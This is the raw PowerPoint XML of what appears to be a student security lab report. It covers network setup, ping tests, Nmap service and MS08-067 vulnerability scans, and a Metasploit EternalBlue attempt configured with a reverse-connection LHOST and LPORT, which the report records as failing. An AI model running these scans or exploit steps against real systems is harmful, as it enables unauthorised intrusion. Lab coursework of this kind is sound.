          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="489891" y="5316340"/>
            <a:ext cx="239907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Ping success Client → Linux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1E2938-EE0F-A5FB-D8B7-82FAAB01F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745" y="1847528"/>
            <a:ext cx="5826161" cy="332468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21DD595-FAA1-3B99-A404-59FF35ED9CFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6581777" y="5316340"/>
            <a:ext cx="239907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Ping across subnets</a:t>
            </a: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1562EAF0-E57F-77B8-C3EB-2759E5475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5341" y="5054730"/>
            <a:ext cx="2195699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IP Address: 192.168.1.10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Subnet: 192.168.1.0/24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DA6DB04-AE50-61AD-756D-4C47DF788DD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8803250" y="5331728"/>
            <a:ext cx="21957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IP Address: 192.168.2.10 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" i="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Subnet: 192.168.2.0/24 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2861020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010EAE-3F88-049C-A345-21F59D1B2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68" y="2140528"/>
            <a:ext cx="5115759" cy="28782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5926DD-C1BE-0AED-8456-6A6744317039}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="281968" y="5231733"/>
            <a:ext cx="6094268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Ping Test Initiated from Kali to Target Server (192.168.2.10)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F017AD-4FFD-69A0-EC03-BF47216B0F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236" y="2140528"/>
            <a:ext cx="5115759" cy="28752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654EFB-E980-F706-4954-8E7891A38B47}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1457325" y="653534"/>
            <a:ext cx="984884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i="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Connectivity Verification Between Kali and Target Server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C5E1C8-3289-65DF-EE83-40E020FF4820}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6657975" y="5231733"/>
            <a:ext cx="6096000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Successful Ping Results Confirming Stable Connectivity</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1171091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D75CBD-9804-A864-3A9A-748A912BD67D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="487275" y="548905"/>
            <a:ext cx="104023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i="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Security Assessment (Kali Setup)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3500" i="1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FEFCBA-BBFD-2247-563B-3E374DD08A6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138307" y="5416542"/>
            <a:ext cx="3198725" cy="569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Aptos Display" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Kali Linux IP configuration and routing table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6A96DE-8D25-10A6-E331-723AE1A49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07" y="1928829"/>
            <a:ext cx="5957693" cy="33393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A5B9BC-CB67-F2FB-5F0C-BE12634DB8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467" y="1973801"/>
            <a:ext cx="5797226" cy="3249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F0CA7D-B5AA-04FD-34B7-6100D5A46602}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6599367" y="5466131"/>
            <a:ext cx="2172929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Ping from Kali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CBC806-7B1A-68E7-F106-D98738F04CF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8024727" y="5466131"/>
            <a:ext cx="3706669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ping 192.168.2.10 — Tests connectivity to server</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1300" i="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" i="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>ping 192.168.2.20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FC03C3-D65F-B577-A44E-34307AD5CA2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3493251" y="5442261"/>
            <a:ext cx="237004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IP Address: 192.168.1.50</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1300" i="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" i="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> Subnet: 192.168.1.0/24 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="689042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23238A-5F40-CCAC-A1C9-6B130037B41D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4308372" y="-18287"/>
            <a:ext cx="381338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i="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Nmap Scanning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4714DD-5D57-8E55-5A00-78D572E32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59615"/>
            <a:ext cx="5993543" cy="33594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5D778C-C0AE-D7C8-749E-36B0E3192853}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="464797" y="5289576"/>
            <a:ext cx="181980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Server scan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91E4730-F8C6-8035-4E15-DFFC2765B5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7145" y="1859615"/>
            <a:ext cx="5752397" cy="335943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D97716F-B418-759C-1199-507BE2F4F8A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6846563" y="5289577"/>
            <a:ext cx="137651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Client scan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BCA756-8674-E36E-C886-397C532DAA6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2284602" y="5466549"/>
            <a:ext cx="1819805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 err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" i="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" i="1" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>sV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" i="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> 192.168.2.10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16B187FF-B6F0-4F06-69A1-ACEA095AE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6868" y="5466549"/>
            <a:ext cx="3634072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Open ports (80, 135, 139, 445, etc.)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Service names (http, </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="13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msrpc</a:t>
            </a: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, </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="13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netbios</a:t>
            </a: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, </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="13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ldap</a:t>
            </a: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Service versions (Microsoft IIS, Windows RPC, etc.)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OS detection hint (Windows Server)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38CA52-8880-34C6-518C-20CAB350A559}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8338438" y="5383538"/>
            <a:ext cx="2876550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 err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" i="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" i="1" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>sS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" i="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" i="1" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>sV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" i="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> 192.168.2.20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BF37ED5-9A31-DB39-1E42-8E978A12A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4919" y="5675926"/>
            <a:ext cx="2805576" cy="969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nmap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→ scanning tool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-</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="13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sS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→ SYN scan (stealth scan)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-</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="13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sV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</a:t>
            </a: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→</a:t>
            </a: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service/version detection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192.168.2.20 → target (client machine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00B2FF-A0FE-8633-F6AD-B4B86E862DB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6215062" y="712915"/>
            <a:ext cx="609600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This screenshot shows an Nmap scan using the command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" i="1" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" i="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" i="1" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>sS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" i="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" i="1" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>sV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" i="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> 192.168.2.20.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1500" i="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" i="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>This scan was used to identify open ports and running services on the client machine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/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F63F3CB-10E7-BE1F-240A-ACCEA16E2FB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="718869"/>
            <a:ext cx="621506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This screenshot shows the result of an Nmap scan using the command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" i="1" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" i="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" i="1" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>sV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" i="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> 192.168.2.10.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1500" i="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" i="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>This allowed me to identify open ports and the services running on the target server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="66459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DBBC1-FDE1-A5F3-758F-BC0007C2D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ABB1AE-A9DD-9656-102E-4E2D0E1D9347}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3416706" y="75446"/>
            <a:ext cx="392026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i="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Vulnerability Detection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D6F9CD-E515-F324-D04C-CD8EB4CF0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222" y="749055"/>
            <a:ext cx="8822443" cy="49450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A1F0F3-3F7E-8FCC-20A0-2AFE741A46E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1122217" y="5770391"/>
            <a:ext cx="482138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Checks for MS08-067 vulnerability on target server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DB2BB5-AB80-E482-D002-CD76035856ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5943601" y="5746103"/>
            <a:ext cx="359228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 err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" i="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> --script smb-vuln-ms08-067 192.168.2.10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055CC2-7FF5-1E6E-2BE2-61AD982CC5BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1861708" y="6169829"/>
            <a:ext cx="742380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This screenshot shows a vulnerability scan using Nmap with the smb-vuln-ms08-067 script.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1500" i="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" i="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>The result indicates that the target system is vulnerable to remote code execution.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2318737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80BCD74-36D6-8567-96F0-283D8B30AE2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3143209" y="118521"/>
            <a:ext cx="736436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i="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Exploitation Attempt (Metasploit)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E81C61-2EB8-E614-1AEB-F67EE091E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29" y="1322580"/>
            <a:ext cx="5969160" cy="33457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3E09D1-4C12-B3D2-34F5-F85D9DBCF3B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311297" y="4776865"/>
            <a:ext cx="1996742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 err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>EternalBlue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" i="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> selected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08E180-BF6E-135D-B1F6-69C54DC91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725" y="1322580"/>
            <a:ext cx="5879690" cy="32956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53C671F-14E2-54D7-0D72-2532C83BD372}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6825389" y="4746327"/>
            <a:ext cx="168361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Exploit configured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E28764-BBD0-41EA-3737-05EA56E1224A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2111829" y="4776865"/>
            <a:ext cx="412189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use exploit/windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" i="1" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" i="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>/ms17_010_eternalblue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38CAA9-06E2-F987-FD5F-5D75CAFAF79F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311297" y="5258693"/>
            <a:ext cx="5663823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This screenshot shows the selection of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" i="1" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>EternalBlue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" i="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> exploit module in Metasploit.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1300" i="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" i="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>This module targets the MS17-010 vulnerability over SMB.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B09517-A64B-6F6A-E016-821503247B11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8924303" y="4775820"/>
            <a:ext cx="207389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set LHOST 192.168.2.50</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" i="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>set LPORT 4444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11CDC5-AA9A-181D-6F85-CB62E8096ACF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6419992" y="5268263"/>
            <a:ext cx="5772008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This screenshot shows the configuration of the exploit in Metasploit.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1300" i="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" i="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>I set the LHOST to my machine’s IP address and LPORT to 4444, which is used to receive the reverse connection.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1738585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4C0BEBB-5C62-2A0E-6BB7-3A71D625258F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3920305" y="0"/>
            <a:ext cx="393566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i="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Exploitation Result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EBB245-CBE0-DB1F-B99B-86564F693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26" y="662742"/>
            <a:ext cx="8360229" cy="467455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BDC80E-21ED-722E-ED86-38628713E6E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6174356" y="5513754"/>
            <a:ext cx="312375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>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Exploit failed / not vulnerable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16D566-FBB1-D626-DA02-CD515B0709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612" y="5836919"/>
            <a:ext cx="6398904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Started reverse TCP handler → exploit started correctly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Using auxiliary/scanner/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="13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smb</a:t>
            </a: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/smb_ms17_010 as check → checking vulnerability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Host does NOT appear vulnerable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Exploit completed, but no session was created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0891AC-5BEC-5F1B-E472-71686746FA3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="219612" y="5513754"/>
            <a:ext cx="610688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i="1" dirty="0"/>
              <a:t>exploit — Launches the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" i="1" dirty="0" err="1"/>
              <a:t>EternalBlue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" i="1" dirty="0"/>
              <a:t> attack against the target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7E91BBC9-8697-4B5F-017C-D6D04578C72B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5643797" y="5675336"/>
            <a:ext cx="238539" cy="5283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F89441-E78A-ADF1-0FBC-D8F100928DB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6174356" y="5945663"/>
            <a:ext cx="599735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i="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>This screenshot shows the execution of the exploit using the ‘exploit’ command in Metasploit.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1300" i="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" i="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>The result indicates that the target system is not vulnerable, and no session was created.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2555790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a4964b5-9709-4dd1-ba39-f7e78650a4f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373125B30C624482E5CCB36DAD3C96" ma:contentTypeVersion="15" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="f4abdc4ee907a4de118a29e6287e779e">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="8a4964b5-9709-4dd1-ba39-f7e78650a4ff" xmlns:ns4="41fa4e0a-074b-4f52-8a7a-a9f5c57b5e7f" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="54de4cf6060e2a41217cf4fad58e7179" ns3:_="" ns4:_="">
    <xsd:import namespace="8a4964b5-9709-4dd1-ba39-f7e78650a4ff"/>
    <xsd:import namespace="41fa4e0a-074b-4f52-8a7a-a9f5c57b5e7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4964b5-9709-4dd1-ba39-f7e78650a4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fa4e0a-074b-4f52-8a7a-a9f5c57b5e7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0328F5-CFCA-45B4-9A49-A9D04A7016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810E8A8-9604-446D-A3F0-EF5E00C9F9B2}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
    <ds:schemaRef ds:uri="http://purl.org/dc/terms/"/>
    <ds:schemaRef ds:uri="http://purl.org/dc/elements/1.1/"/>
    <ds:schemaRef ds:uri="8a4964b5-9709-4dd1-ba39-f7e78650a4ff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1fa4e0a-074b-4f52-8a7a-a9f5c57b5e7f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F052259-F982-4067-9AE1-0E3E9FB088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4964b5-9709-4dd1-ba39-f7e78650a4ff"/>
    <ds:schemaRef ds:uri="41fa4e0a-074b-4f52-8a7a-a9f5c57b5e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Task 1 – Network Setup and Connectivity Configuration</Template>
  <TotalTime>865</TotalTime>
  <Words>592</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>74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 Network Setup and Connectivity Configuration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Andrian Morteanu (2242425)</dc:creator>
  <cp:lastModifiedBy>Andrian Morteanu (2242425)</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-04-21T17:45:10Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-23T12:07:35Z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0x01010015373125B30C624482E5CCB36DAD3C96</vt:lpwstr>
  </property>
</Properties>
</file>